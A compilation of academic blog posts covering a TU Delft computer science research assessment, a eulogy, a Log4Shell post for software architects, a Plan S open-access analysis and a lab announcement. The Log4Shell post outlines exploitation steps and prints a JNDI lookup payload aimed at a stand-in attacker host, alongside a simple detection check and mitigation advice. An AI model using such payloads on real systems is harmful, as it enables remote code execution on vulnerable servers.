TU Delft Computer Science Research Assessment 2015-2020

Last year, the TU Delft computer science research programs were evaluated, comprising a reflection on the preceding six years (2015-2020) and an outlook on the next six years.

The assessment follows the Strategy Evaluation Protocol (SEP), used by all Dutch universities, which focuses on research quality, societal impact, and viability. The assessment is conducted by an international external committee. It is based on a self-assessment written by us, as well as a two-day site visit by the committee.

Arie van Deursen and Alan Hanjalic in the Computer Science building

At TU Delft, computer science is organized into two departments: Intelligent Systems, chaired by Alan Hanjalic, and Software Technology, chaired by me.

In 2021, Alan and I together worked hard to compile our self-assessment report. It is based on extensive discussions with and contributions by many people, both inside and outside the two departments. It contains our thoughts on what we want computer science in Delft to achieve (our mission), what we did to achieve this (our strategy), an assessment of the success of our approach (our SWOT), and a plan of action for the next years ahead (our future strategy).

We proudly make the full self-assessment report available via this link — the only modification being that for reasons of privacy we omitted some of the appendices that could be traced back too easily to individual faculty members.

As part of the protocol, the committee’s findings, as well as the reaction of the executive board to these findings, have been made available as well, at the central TU Delft site. The committee is “positive about the very high and often excellent research quality, the high quality of the staff as well as the energy, drive and potential of the primarily junior research staff of both departments,” and “recognizes the relevance and societal impact of the research carried out by the INSY and ST departments.”

We are grateful to the external committee, and in particular for the 17 recommendations that will help us further strengthen TU Delft computer science. We have integrated these recommendations into the action plan already laid out in our self-assessment, and look forward to working with everyone in our departments and our faculty to execute this action plan in the next few years.

Below, we provide the executive summary of our self-assessment, and we invite you to have a look at our full report.


Self-Assessment Summary

The phenomena of datafication and AI-zation reflect the increasing tendency to quantify everything through data and to automate the decision-making processes that are also largely based on data. Since these phenomena have entered all segments of our lives and since research in computer science (CS) is at the heart of the technological developments underlying these phenomena, CS as a research field has gained strategic importance. TU Delft Computer Science operates at the forefront of these developments with the aim to help society at large, by enabling it to maximally benefit from these phenomena, while protecting it from potential risks. To that end, inspired and driven by the TU Delft core values of Diversity, Inclusion, Respect, Engagement, Courage and Trust (DIRECT), our mission includes (1) conducting world class research in selected computer science core areas; (2) maximizing opportunities for societal impact of our research; (3) providing rigorous, research-inspired engineering education in computer science; and (4) contributing to an international academic culture that is open, diverse and inclusive, and that offers openly available knowledge.

We are organized in two departments, Intelligent Systems and Software Technology, consisting of 5 and 6 sections respectively. Sections are small-scale organizational units, typically headed by a full or associate professor and marking a particular CS disciplinary scope. While the departments are separate units, they work closely together in research and education, and collaborate for societal impact. The convergence between the departments in terms of alignment and joint pursuit of strategic and operational goals has even become so strong over recent years that we can speak of an increasingly recognizable CS entity in Delft organizing its research into five main themes transcending the departmental and section boundaries: (1) decision support; (2) data management and analytics; (3) software systems engineering; (4) networked and distributed systems; and (5) security and privacy. The themes offer critical mass in order to achieve substantial impact, and each theme involves many researchers with various CS backgrounds and expertise.

Award-winning research in these themes achieved during 2015-2020 includes a novel cross-modal (e.g., combining text and images) retrieval method based on adversarial learning; genetic algorithms for the automatic reproduction of software crashes to facilitate automated debugging; and Trustchain, a permission-less tamper-proof data structure for storing transaction records of agents, with applications in digital identity. International recognition of our expertise is reflected by many leadership roles, e.g., as general or program chairs of flagship conferences such as AAAI, EuroGraphics, ACM/IEEE ICSE, ACM OOPSLA, ACM RecSys and ACM Multimedia. In the same time period, several staff members also received the highest (inter)national recognition in their fields, such as IEEE Fellow, membership of the Young Academy of the Royal Dutch Academy of Sciences, or the Netherlands Prize for ICT Research. Our scientific reputation also brought us into the consortia of two prestigious NWO Gravitation Projects (“NWO Zwaartekracht“) of the Dutch Research Council, Hybrid Intelligence and BRAINSCAPES – the consortia that “belong to the world top in their field of research or have the potential to do so”.

To maximize societal impact, we embrace eight key sectors: transport and logistics, energy, health and well-being, safety and security, finance, online education, creative industry, and smart cities. To enable and support us in making substantial interdisciplinary impact in these sectors, we have built up expertise and a network of collaborators and societal partners, and established the necessary organizational structures. Prominent examples of our impact in these sectors include the NGS sequencing analysis pipeline we designed and implemented as part of the NIPT test, which is used routinely by hospitals in several countries; Cytosplore, a software system for interactive visual single-cell profiling of the immune system; and SocialGlass, a tool suite for integration, enrichment, and sense-making of urban data. Our close ties with society are also reflected in our strategic collaborations with socio-economic partners, such as ING, DSM, Booking.com, Adyen, Ripple, Erasmus Medical Center and Leiden University Medical Center, leading amongst other things to strategic investments in the form of three large industry-funded labs (with ING, DSM and Booking.com) set up in the assessed time period for a duration of five years. Furthermore, we have invested extensive effort in public outreach, explaining and discussing science with a broad audience, in particular in the context of complex societal debates in the domain of AI and blockchain. Finally, we play a leading role in regional, national and European initiatives, most notably in the Dutch AI Coalition (NLAIC).

In addition to scientific excellence and strong impact in the selected societal sectors, we are committed to (a) meeting the increasing societal need for highly skilled CS experts, (b) development of human capital in our organization, leading to a new generation of international academic leaders, and (c) advancing the organization and academic culture, with the key pillars of open science, diversity and inclusion.

Regarding (a), we embraced an increase of over 100% in our student population, while also aiming to secure the highest possible level of knowledge, skills and academic formation despite scaling up. Therefore, we value a close connection between research and education, and let both MSc and BSc students participate actively in our research. We also formulated an ambitious strategy, the realization of which would enable us to manage this education scale-up efficiently and effectively, leaving sufficient room for our staff to further develop scientific excellence and deploy it for societal impact. Part of this strategy is the growth of our academic staff towards 100 FTE by 2024, to match the stabilization of student numbers (due to the numerus fixus). Between 2015 and 2020, we already achieved a net growth from 54 to 72 faculty members (+33%), with more to come in the upcoming years.

Next to BSc and MSc students, we are committed to delivering highly skilled CS experts at the PhD level. The number of PhD students grew from 105 to 165 (+57%) in the assessed time period, reflecting our ability to successfully acquire research funding in the present landscape. For our PhD students, the Graduate School defines a framework in which they can develop their skills next to conducting their thesis research. We strive for completion of PhD theses within four years, and organize our supervision, formal assessment moments, requirements on the volume and quality of the conducted research, and the evidence of scientific impact through publications, accordingly.

Regarding (b), development of human capital: as computer science expertise is in high demand across the globe, finding strong new people as well as retaining our current staff proved highly challenging, especially given the high teaching load due to our record student intake. Therefore, acquiring, developing and retaining academic talent has been one of our most important goals. Dedicated actions, such as the devising of a Development Track Plan, serve to empower each staff member to contribute to the organization in their own way, based on individual interests, talents and ambitions, and in view of our joint ambition as an organization.

In view of (c), our organization, we embrace open science, with a substantial percentage (80% in 2020) of our articles available as open access, and by making numerous software tools and data sets openly available. We are a highly international organization with employees and students from all over the world. We strive to be an inclusive organization, where staff and students feel at home and valued, regardless of their background, age, gender, sexual orientation or functional disability. In terms of female faculty, we realized a net growth from 11 to 14 faculty members. As the number of men employed also increased, the percentage of female faculty stayed stable at around 20%. We consider this too low. We are committed to addressing this, for which we will take a long-term approach with, amongst other means, dedicated budget reserved for continued openings for female faculty in the upcoming years.

We are proud of our scientific successes and societal impact in the core computer science disciplines as well as in interdisciplinary research in our target societal sectors. This is especially so as those were achieved in a period that was transformational for TU Delft Computer Science, characterized by substantial growth and development across our organization and activities. We anticipate an even stronger societal demand for our research and expertise in the future. We will therefore continue to initiate, participate in, and take on a key role in effective and interdisciplinary partnerships at the university (TU Delft AI), regional (LDE), national (ICAI, IPN), and European (ELLIS, CLAIRE) levels. Furthermore, we will continue the growth path for our staff, in order to build up capacity enabling us to further develop our scientific excellence and offer our strongly increased student population the world-class research-intensive education they deserve. To achieve this, we center the next steps in our ongoing transformation around people, organization, and profiling, and identify seven key actions for the upcoming years that aim at (1) improving our attractiveness as an employer; (2) improving diversity and inclusion; (3) improving the execution of the PhD program; (4) expanding our staff capacity; (5) aligning our office space with the optimal way of working; (6) articulating the scientific profile; and (7) boosting our scientific and societal impact.

Eelco Visser (1966-2022)

Text of the eulogy for Eelco Visser (12 October 1966 – 5 April 2022), delivered at his farewell ceremony in Leusden on 12 April 2022. Original text in Dutch.


I stand in front of you, in total disbelief, as head of the department where Eelco Visser worked for the last 15 years.

I would like to offer you my perspective on Eelco’s significance, as a scientist, as a teacher, and as a person.

Eelco and I got to know each other in 1992, thirty years ago.

At the time, I was halfway my PhD in Amsterdam, working in the group of Paul Klint. Eelco was studying in Amsterdam, following Paul’s courses. These were so inspiring to Eelco that he decided to join Paul’s group, first to write his master’s thesis, and then to work on his PhD.

It didn’t take long before Eelco and I had a connection. We had extensive discussions about research. The details don’t matter, and they didn’t really lead to concrete results. But thirty years later I still remember the substantive drive, the deep desire to profoundly understand a problem, the feeling of working together on something very important, and, of course, Eelco’s tenacity.

Eelco has been able to maintain that same drive for thirty years. Just like he knew how to inspire me, year after year he has inspired his students and his (international) peers — always driven by content, always persistent.

This contributed to Eelco’s research being of the highest international level. Let me illustrate this through an award he received in 2020, a so-called Most Influential Paper award. This is an award you receive ten years after publication, once it has been established that your paper actually made the biggest impact.

Eelco received this award for his article from 2010 on Spoofax, written with (then) PhD student Lennart Kats. Eelco was very proud of this award, and rightly so. In fact, he was so proud that he wrote a (long) blog post about it, entitled “A short history of the Spoofax language workbench.”

This “short history” starts in 1993 with Eelco’s PhD research in Amsterdam. Next, Eelco explains his journey, from Portland as a postdoc, via Utrecht as assistant professor, to Delft as associate and full professor. Each of these stops provides building blocks for the award-winning paper from 2010. And then, Eelco’s “short history” continues: he describes what his group has done in the ten years since the paper’s publication, and what good things he still has in store for the time to come.

To me, this “short history” is signature Eelco:

  • Visionary, working year after year on building blocks that all belong together
  • System-driven, with working software that he preferably contributes to himself
  • In a team, together with his PhD students, postdocs, engineers, students, and numerous international co-workers.

This short history also serves to illustrate the international side of Eelco’s work. He was very active, and loved, within international organizations like IFIP and ACM SIGPLAN. He succeeded in bringing the flagship SPLASH conference to Europe for the first time.

And, naturally, Eelco had a vision on how to improve things: all those conferences putting effort into ad hoc web sites: there had to be a better way. And so, in line with his systems philosophy, he designed the CONF system that has been up and running for ten years now. And he managed to convince hundreds of conferences to use his system, for a fee.

Likewise, Eelco had a vision on education, and he knew how to realize it. In his opinion, programming education just had to be better. Thus, he designed a system, WebLab, which has also been in operation for almost 10 years now. And here too he managed to convince countless teachers to use his system.

In addition, Eelco had a well-thought-out opinion about the courses that belong in a computer science program. So when we needed to revise our curriculum, Eelco was the perfect candidate to chair the associated committee. Eelco did this graciously, in a calm and persistent manner, reasoning from educational principles to settle disputes. The result is rock solid.

Eelco’s education is well characterized by Willem-Paul Brinkman in the online Farewell Community: “Without maybe realizing it, many generations of Delft students will benefit from his teaching innovations.”

Eelco was proud of his Programming Languages Group. He built it up from scratch into an international top group. He took good care of his people, fighting for the best equipment and offices. As a member of the departmental management team, he fought for computer science in full, at faculty and university level. Nationally he was active in, for example, the Dutch National Association for Software Engineering VERSEN.

And how was Eelco able to realize all this? What was his secret?

Perhaps Eelco actually liked (a little) resistance. He was not afraid to disagree: after all, he had thought deeply about his opinion. And he was fine with being challenged: it was a sign that he was well on his way to breaking the status quo.

Maybe not everyone always found this easy. But Eelco was also very friendly, and certainly willing to change his mind.

And, Eelco was also patient: Big changes take time. If he saw that he had insufficient supporters, he could wait. Or, under the radar, start small in order to set his own plans in motion.

How much we will miss Eelco in Delft! The visionary, the obstinate, the focus on the content, the love for computer science, the tenacity, and the attention for students and colleagues: exactly what we need so much in Delft.

Let me conclude with a few words related to Corona and the lockdown. The past two years, Eelco and I were in touch weekly, mostly within the departmental management team, but also often one-on-one. All online, from home. We discussed departmental matters, small and large, as well as the impact of Corona. On one thing we agreed: being at home more, seeing more of your children, doing more with the family: we both experienced this as a gift.

Due to the lockdown, I don’t know when it was that I last saw Eelco in person. I think it was on October 14, at the PhD defense of Arjen Rouvoet. That was a beautiful day, and this is how I like to remember Eelco: science at the highest level, international peers in substantive debate, a cum laude PhD defense, and Eelco happy, radiant in the midst of his PL group.

Dear family, friends, colleagues, everyone: We will miss Eelco very much. Each of us has his or her own, wonderful memories of Eelco. Today is a day to hold on to that, and to share those memories with each other.

I wish you all, and especially the family, all the best.


Log4Shell: Lessons Learned for Software Architects

This week, the log4shell vulnerability in the Apache log4j library was discovered (CVE-2021-44228). Exploiting this vulnerability is extremely simple, and log4j is used in many, many software systems that are critical to society — a lethal combination. What are the key lessons you as a software architect can draw from this?

The vulnerability

In versions 2.0-2.14.1, the log4j library would take special action when logging messages containing "${jndi:ldap://LDAP-SERVER/a}": it would look up a Java class on the LDAP server mentioned, and execute that class.

This should of course never have been a feature, as it is almost the definition of a remote code execution vulnerability. Consequently, the steps to exploit a target system are alarmingly simple:

  1. Create a nasty class that you would like to execute on your target;
  2. Set up your own LDAP server somewhere that can serve your nasty class;
  3. "Attack" your target by feeding it strings of the form "${jndi:ldap://LDAP-SERVER/a}" wherever possible — in web forms, search forms, HTTP requests, etc. If you’re lucky, some of this user input is logged, and just like that your nasty class gets executed.
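To make the shape of the attack string concrete, here is a minimal, self-contained sketch in plain Java. The class name `JndiPayloadCheck` and the server `attacker.example` are hypothetical, and note that a naive scan like this is illustrative only, not a defense: real payloads can be obfuscated (e.g. with nested lookups), so pattern matching is no substitute for fixing the library.

```java
// Illustration only: the shape of a log4shell payload and a naive check for it.
// Pattern matching is NOT a reliable mitigation; attackers obfuscate payloads.
public class JndiPayloadCheck {

    // True if the input contains a "${jndi:" lookup, case-insensitively.
    public static boolean looksLikeJndiPayload(String input) {
        return input != null && input.toLowerCase().contains("${jndi:");
    }

    public static void main(String[] args) {
        String attack = "${jndi:ldap://attacker.example/a}"; // hypothetical attacker server
        String benign = "user logged in: alice";
        System.out.println(looksLikeJndiPayload(attack));  // true
        System.out.println(looksLikeJndiPayload(benign));  // false
    }
}
```

Any code path that logs such user input with a vulnerable log4j version — a username field, a `User-Agent` header — completes the attack.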

Interestingly, this recipe can also be used to make a running instance of a system immune to such attacks, in an approach dubbed logout4shell: if your nasty class actually wants to be friendly, it can programmatically disable remote JNDI execution, thus safeguarding the system against new attacks (until the system is restarted).
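The same message-lookup machinery can also be switched off up front rather than through a friendly payload: since log4j 2.10, lookups can be disabled with a system property. A sketch, assuming your launch script can pass JVM flags (`my-app.jar` is a placeholder); this was a widely used stop-gap for versions 2.10-2.14.1, not a substitute for upgrading:

```shell
# Disable log4j message lookups at JVM startup (log4j 2.10 and later).
# "my-app.jar" is a placeholder for your own application.
java -Dlog4j2.formatMsgNoLookups=true -jar my-app.jar
```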

The source code for logout4shell is available on GitHub: it also serves as an illustration of how extremely simple any attack will be.

Under attack

As long as your system is vulnerable, you should assume you or your customers are under attack:

  1. Depending on the type of information stored or services provided, (foreign) nation states may use the opportunity to collect as much (confidential) information as possible, or infect the system so that it can be accessed later;
  2. Ransomware "entrepreneurs" are delighted by the log4shell opportunity. No doubt their investments in an infrastructure to scan systems for this vulnerability and ensure future access to these systems will pay off.
  3. Insiders, intrigued by the simplicity of the exploit, may be tempted to explore systems beyond their access levels.

All this calls for a system setup according to the highest security standards: deployments that are isolated as much as possible, access logs, and the ability to detect unwarranted changes (infections) to deployed systems.

Applying the Fix

Naturally, the new release of log4j, version 2.15, contains a fix. Thus, the direct solution for affected systems is to simply upgrade the log4j dependency to 2.15, and re-deploy the safe system as soon as possible.
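For projects that declare log4j directly, the change can be as small as one version bump. A sketch, assuming a Maven build; if your project only pulls in `log4j-core` transitively, you need a `dependencyManagement` entry or an explicit override instead:

```xml
<!-- Sketch, assuming a Maven build: pin the patched log4j version. -->
<dependency>
  <groupId>org.apache.logging.log4j</groupId>
  <artifactId>log4j-core</artifactId>
  <version>2.15.0</version>
</dependency>
```

Running `mvn dependency:tree` (or your build tool's equivalent) helps verify that no older log4j-core remains on the classpath through transitive dependencies.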

This may be more involved in some cases, due to backward incompatibilities that may have been introduced. For example, in version 2.13 support for Java 7 was stopped. So if you’re still on Java 7, just upgrading log4j is not as simple (and you may have other security problems than just log4shell). If you’re still stuck with log4j 1.x (end-of-life since 2015), then log4shell isn’t a problem, but you have other security problems instead.

Furthermore, log4j is widely used in other libraries you may depend on, such as Apache Flink, Apache Solr, neo4j, Elasticsearch, or Apache Struts: see the list of over 150 affected systems. Upgrading such systems may be more involved, for example if you’re a few versions behind or if you’re stuck with Java 7. Earlier, I described how upgrading a system using Struts, Spring, and Hibernate took over two weeks of work.

All this serves as a reminder of the importance of dependency hygiene: the need to ensure dependencies are at their latest versions at all times. Upgrading versions can be painful in case of backward incompatibilities. This pain should be swallowed as early as possible, and not postponed until the moment an urgent security upgrade is needed.

Deploying the Fix

Deploying the fix yourself should be simple: with an adequate continuous deployment infrastructure, it is a simple push of a button, or an automatic reaction to a commit.

If your customers need to install an upgraded version of your system themselves, things may be harder. Here investments in a smooth update process pay off, as well as a disciplined versioning approach that encourages customers to update their system regularly, with as few incompatibility roadblocks as possible.

If your system is a library, you’re probably using semantic versioning. Ideally, the upgrade’s only change is the upgrade of log4j, meaning your release can simply increment the patch version identifier. If necessary, you can consider backporting the patch to earlier major releases.

Your Open Source Stack

As illustrated by log4shell, most modern software stacks critically depend on open source libraries. If you benefit from open source, it is imperative that you donate back. This can be in kind, by freeing your own developers to contribute to open source. A simpler approach may be to donate money, for example to the Apache Software Foundation. This can also buy you influence, to make sure the open source libraries develop the features you want, or conduct the security audits that you hope for.

The Role of the Architect

As a software architect, your key role is not to react to an event like log4shell. Instead, it is to design a system that minimizes the likelihood of such an event and its impact on the confidentiality, integrity and availability of that system.

This requires investments in:

  • Maintainability: enforcing dependency hygiene and keeping dependencies current at all times, to minimize mean time to repair and maximize availability;
  • Deployment security: isolating components where possible and logging access, to safeguard confidentiality and integrity;
  • Upgradability: ensuring that those who have installed your system or who use your library can seamlessly upgrade to (security) patches;
  • The open source ecosystem: sponsoring the development of open source components you depend on, and contributing to their security practices.

To make this happen, you must guide the work of multiple people, including developers, customer care, operations engineers, and the security officer, and secure sufficient resources (including time and money) for them. Most importantly, this requires that as an architect you must be an effective communicator at multiple levels, from developer to CEO, from engine room to penthouse.

Europe’s Open Access “Plan S” and Paper Publishing in Software Engineering Research

A year ago, more than a dozen influential research funders in Europe launched Plan S. This plan imposes, from 2021 onwards, strict requirements on the open access publishing of any research funded through the Plan S coalition. To understand what this means for my field of research, software engineering, I did some data collection. My data suggests that 14% (one out of seven) of the published papers are affected, meaning that conferences may lose 14% of their papers, unless publishers take action.

Plan S in a Nutshell

Plan S is an initiative launched by:

  • The European Union, which runs the Horizon Europe program of €100 billion (over 113 billion US dollars). It is the successor to H2020, and includes funding for the prestigious personal grants of the European Research Council (ERC).
  • Twelve national research funding organizations, from various European countries, such as The Netherlands (where I live), the United Kingdom, and Austria.

The aim of these Plan S “funders” (collectively called “Coalition S”), is that

With effect from 2021, all scholarly publications on the results from research funded by public or private grants provided by national, regional and international research councils and funding bodies, must be published in Open Access Journals, on Open Access Platforms, or made immediately available through Open Access Repositories without embargo.

The coalition has taken an axiomatic approach to expressing its plans, starting with 10 principles, followed by a Guidance to the Implementation. The result is a somewhat hard-to-understand document, in which there are multiple ways to become Plan S compliant.

In all forms of Plan S compliance the Creative Commons license plays a key role. As Plan S (under the header Rights and Licensing) puts it:

The public must be granted a worldwide, royalty-free, non-exclusive, irrevocable license to share (i.e., copy and redistribute the material in any medium or format) and adapt (i.e., remix, transform, and build upon the material) the article for any purpose, including commercial, provided proper attribution is given to the author.

This, thus, corresponds to the Creative Commons Attribution license, also known as CC BY. Note that this is a very generous license, essentially allowing anyone to do anything with the paper. Traditionally, publishers do not like this, as they wish to keep exclusive control over who distributes the paper.

Strictly speaking, Plan S does not require CC BY per se, but authors need to ask permission for any other license. For the CC BY-SA “Share-Alike” variant of the license permission will be granted automatically, but for CC BY-ND “No Derivatives” permission needs to be asked. Coalition S explicitly indicates that CC BY-NC “Non-Commercial” is not allowed:

We will not accept a Non-Commercial restriction on the re-use of research results.

Given this CC BY starting point, Plan S distinguishes three routes to compliance:

  1. Open access venues: The conference or journal is gold open access, meaning all papers in it are freely available. This is “the ideal” case, from Plan S perspective, and compliant. Open access fees (“Article Processing Charges”) are common in this route, and will be refunded by Coalition S.
  2. Subscription-based venues: These by themselves are non-compliant, but can be made compliant if the author immediately (no embargo) deposits the Author’s Accepted Manuscript (AAM) in a compliant repository with a CC BY license. This license is a complicating factor, since many publishers restrict redistribution of self-archived papers (only the authors themselves may archive the paper, which is at odds with the sharing principle of CC BY). If such restrictions exist, a way out can be hybrid open access, in which authors pay an extra fee to make their own article available open access under a CC BY license. This model is offered by many publishers, but not by all. Note, however, that while this route is “compliant”, Plan S does not refund the APC fees.
  3. Subscription venues in transition: If the conference or journal is not open access yet, but is in transition towards a full open access model by 2024, the publisher and Plan S can agree on “transformative arrangements”. In this case the paper will be compliant, and any fees involved will (likely) be covered.

The 10 principles also address other issues relevant to open access: they require that “the structure of fees must be transparent” (principle 05, suggesting that some of the current article processing charges are inexplicably high), and warn that the funders will monitor compliance and sanction non-compliant beneficiaries/grantees (principle 09, a direct threat to me).

Plan S should start in 2021, although publishers can earn some extra time by participating in the above-mentioned “transformative arrangements”.

Plan S Compliance in Software Engineering Research

To understand whether Plan S compliant publishing in my area of research, software engineering, is possible at the moment, I looked at the top 20 venues in the area of Software Systems, according to Google Metrics.

In these top 20 venues, just three are gold open access: POPL and OOPSLA, both published by ACM SIGPLAN, and ETAPS TACAS, published by Springer. It is in these venues that authors funded through Coalition S can safely publish, following the gold open access route to compliance. Their open access fees will be covered by the Coalition S funders.

The remaining 17 are closed access subscription venues, published by ACM, IEEE, Elsevier and Springer. Authors who wish to publish there, and who need to be compliant with Plan S, would then have to resort to the self-archiving route.

Since the self-archiving constraints of these four publishers do not permit the use of CC BY without a fee, the hybrid route applies, in which (1) authors pay a fee; (2) the publisher distributes with CC BY; and (3) the author shares on a Plan S compliant repository. Note that this route is compliant, but that the fee is not refunded by Coalition S.

This self-archiving route works for IEEE journals, but not for IEEE conferences. This is because, for IEEE conferences, authors presently do not have the option to pay a fee to publish just their own paper open access (unlike ACM). As stated by IEEE in their FAQ on the “IEEE Policy Regarding Authors Rights to Post Accepted Versions of Their Articles”:

Currently IEEE does not have an Open Access program for conference articles.

In other words: Conferences published by IEEE are not Plan S compliant, not even with the green open access route (as IEEE does not permit CC BY).

Of the 20 venues, IEEE is the sole publisher of two conferences (ICSME and SANER), one magazine (IEEE Software), and the co-publisher of another three (ICSE, SANER, MSR) which are published alternatingly by IEEE or ACM.

In summary, of the 20 top venues:

  • Three are compliant through gold open access.
  • Eleven are compliant through a fee-based hybrid model with CC BY.
  • Three are half of the time compliant through a fee-based hybrid model with CC BY, the other half non-compliant.
  • Three can presently not be made compliant.

Note that other fields may fare better: top conferences in security (Usenix), AI (AAAI, NIPS), or OOPSLA/POPL/ICFP sponsored by SIGPLAN are all full gold open access. This, however, seems the exception rather than the rule.

Plan S Rationale

With Plan S requiring many publishers to change their policies, one may wonder what the rationale behind this plan is. The way I see it, the key reason for the European funders to propose this plan is leverage, in the following ways:

  • The European Union as a whole will benefit more from their €100 billion investment, if any (European) citizen can freely access the resulting knowledge;
  • Research is never conducted in isolation. Progress in research is not just visible in papers directly funded through a project, but also in subsequent papers building on top of those results (refuting, strengthening, criticizing, or expanding them). The more venues are open access, the higher the chance that these follow up results are also published as open access.
  • The universities in the European Union together will benefit financially if the publishing market shifts towards open access: The current profit margins of up to 40% of publishing giants like Elsevier are a waste of taxpayer money that instead should be directly invested in research and education, the exact causes that the EU and its Horizon Europe program seek to advance as well. Pumping €100 billion into a system that wastes money at scale is ineffective.

Furthermore, note that this coalition works in all areas of research, including climate change, health care, and artificial intelligence. From the European perspective, the world needs informed societal debate about these topics. To that end, the EU is committed to maximizing the free availability of any research it is funding.

Last but not least, Coalition S is working hard to expand the list of funders, talking to both China and India, for example. Also, Jordan and Zambia have already joined, as well as the Bill and Melinda Gates Foundation (though their presence in computer science research is limited, compared to, e.g., China).

Impact on Software Engineering Conferences

With software engineering venues so clearly affected by Plan S, the next question is how many papers will be affected. Thus, I decided to collect some data, to measure the impact of Plan S in my field.

Since conferences (with full length, rigorously reviewed papers) are dominant in software engineering, I focused on these. I picked two editions of ICSE and ESEC/FSE (for which I am a member of the steering committee), and of the smaller and more specialized ISSTA conference (which I happened to attend this summer).

For each published paper, I manually checked the acknowledgments to see whether the authors were beneficiaries of any of the Plan S funders. I did this for the main (technical research) track papers only, and not for, e.g., demonstration sub-tracks.

The results (also available as spreadsheet) are as follows:

Table with data per conference

A few results stand out:

  1. Overall, 14% (1 in 7) of the papers currently receive grants from Coalition S.
  2. The two big conferences, ICSE (over 1000 participants) and ESEC/FSE (over 300 participants), exhibit an impact on around 11-12% of the papers.
  3. For the smaller ISSTA conference, more than 25% of the papers are (co-)funded through Coalition S. This number reflects the composition of the community, and the impact is enlarged by the small total number of papers. Should the affected researchers decide not to submit to ISSTA anymore, this may constitute an existential threat to the conference.
  4. The EU is by far the biggest funder, with researchers and industry from many countries benefiting from participation in large EU projects. Furthermore, the EU ERC (Advanced) Grants are extremely prestigious (€2.5 million) and have been won by leaders in the software engineering field such as (in the collected data) Carlo Ghezzi, Mark Harman, Bashar Nuseibeh, and Andreas Zeller.
  5. The UK is the second biggest funder, mostly through its EPSRC program. This is the UK’s national program, unrelated to the European Union. Thus, EPSRC’s participation in Coalition S will not be affected by Brexit (apart from increased financial pressure on EPSRC’s overall budget as the UK’s economy shrinks).
  6. While a small country with limited funds, Luxembourg is very active in the area of software engineering, causing high impact for, e.g., the ISSTA conference.

The 14% I found is substantially higher than the estimate of 6% impact found by Clarivate Analytics (cited by the ACM), and the 5% found by the ACM itself. If anything, this difference of a factor of 3 (or even 5 for ISSTA) calls for a detailed assessment of each venue affected.

My data is based on what I saw in the acknowledgments: In reality it is likely that more papers are affected. You can check your own papers in my online spreadsheet; corrections are welcome.

Collecting the data took me around a minute per paper. You are cordially invited to repeat this exercise for your own favorite conference or journal (TSE, EMSE, JSS, MSR, ICSME, RE, MODELS, …), and I will do my best to reflect your data in this post. If you’re a conference organizer, the safest thing to do is to survey authors about their funding, enquiring explicitly about Coalition S based funding.

There is another point to be made that required little data gathering.

The 14% figure relates to impact on the conference. Individual researchers can be affected much more. Our group at TU Delft, for example, has been very successful in attracting substantial funding both from the EU and from the Dutch NWO. As a consequence, for me personally, half of my publications will be affected. For some new PhD students starting in my group funded on such projects all publications will be affected.

A Call for Action

Clearly, the impact of Plan S can be substantial, on individual researchers as well as on conferences and journals.

This calls for action.

ACM, as one of the leading publishers in computer science, shared an update on their Plan S progress in their July 2019 newsletter. It states:

It is worth noting that ACM has been working with various consortia in the US, Europe, and elsewhere on a framework for transitioning the traditional ACM Digital Library licensing (subscription) model to a Gold Open Access model utilizing an innovative “transformative agreement” model. More details will be announced later in 2019 as the first of these Agreements are executed; once these are in place, all ACM Publications will comply with the majority of Plan S requirements.

This is good news, and certainly not a simple undertaking. I sincerely hope that ACM will be able to meet not just the majority, but all requirements, and for all conferences and journals. This essentially implies a change of business model for the ACM Digital Library, from a subscription-based to an author-(institution)-pays model. This in itself will not be easy, and is further complicated by several constraints and strong criteria imposed by Plan S, for example concerning cost transparency. The key challenge will be to convince Coalition S that these criteria are indeed met.

The ACM Special Interest Group on Programming Languages, SIGPLAN, meanwhile, sets an example on how to progress within the current setting. The research papers of three of its key conferences are published as part of the Proceedings of the ACM in Programming Languages. This is a Gold Open Access journal in which different volumes are devoted to different conferences. The POPL, OOPSLA, and ICFP conferences have adopted this model, and hence are fully open access. To quote the Inaugural Editorial Message by Philip Wadler:

PACMPL is a Gold Open Access journal. It will be archived in ACM’s Digital Library, but no membership or fee is required for access. Gold Open Access has been made possible by generous funding through ACM SIGPLAN, which will cover all open access costs in the event authors cannot. Authors who can cover the costs may do so by paying an Article Processing Charge (APC). PACMPL, SIGPLAN, and ACM Headquarters are committed to exploring routes to making Gold Open Access publication both affordable and sustainable.

The ACM SIG for Software Engineering, SIGSOFT, so far has not taken action along these lines. Nevertheless, doing so should be relatively simple, especially since SIGPLAN has laid out all the groundwork.

Furthermore, last year, we as ACM SIGSOFT members elected Tom Zimmermann as our chair. In his statement for the elections he wrote:

We should make gold open access a priority for SIGSOFT

He also provided details on how to achieve this, mostly along the lines of SIGPLAN. By electing him, we as ACM SIGSOFT members gave him the mandate to carry this out. This will not be easy to do, and it calls for the full support of the software engineering research community to help the ACM SIGSOFT leadership with this important mission.

The other main non-profit society publisher in software engineering is the IEEE. IEEE publishes various conferences and journals in software engineering on its own, such as ICSME, MODELS, RE and ICST. Furthermore, several major conferences are co-sponsored by IEEE and ACM together, such as ICSE and ASE.

Unfortunately, I have not been able to find online information about IEEE’s vision on Plan S, and its impact on the conference proceedings published by the IEEE. This makes it very unclear what, from 2021 onwards, the publication options are for many software engineering conferences.

Nevertheless, it is my hope that IEEE will embrace Plan S, and move to open access conference proceedings, as many other society publishers have done.

This, then, will open the floor to joint open access publications, for example through the new fully open access “Proceedings of the ACM in Software Engineering”.


Version History

  • Version 0.4, 20-08-2019. First public version.
  • Version 0.5, 25-08-2019. Major update to reflect that the self-archiving route can also be used to meet Plan S requirements.
  • Version 0.6, 26-08-2019. Small updates about CC BY options.
  • Version 0.7, 28-08-2019. Major update about the repository route in combination with CC BY and hybrid open access, and transformative arrangements.
  • Version 0.8, 30-08-2019. Added links to the IEEE open access FAQ.
  • Version 0.9, 04-09-2019. Small typos fixed.

Note: IANAL — use this information at your own risk.

Acknowledgements: Thanks to Diomidis Spinellis, Simon Bains, Jeroen Bosman, Bianca Kramer, and Jeroen Sondervan for feedback on an earlier draft of this post.

License: Copyright (c) Arie van Deursen, 2019. Licensed under CC BY.

Slide Deck

Slides

Launching AFL: The AI for Fintech Lab

AFL Announcement

I am extremely proud that yesterday we publicly announced the AI for Fintech Lab — AFL.

The AI for Fintech Lab (AFL) is a collaboration between ING and Delft University of Technology. The mission of AFL is to perform world-class research at the intersection of Artificial Intelligence, Data Analytics, and Software Analytics in the context of FinTech.

With 36 million customers, activities in 42 countries, and a total of 50,000 employees of which 15,000 work in IT, software and data technology is at the heart of ING’s business and operations. In this context, the AFL seeks to develop new AI-driven theories, methods, and tools in large scale data and software analytics.

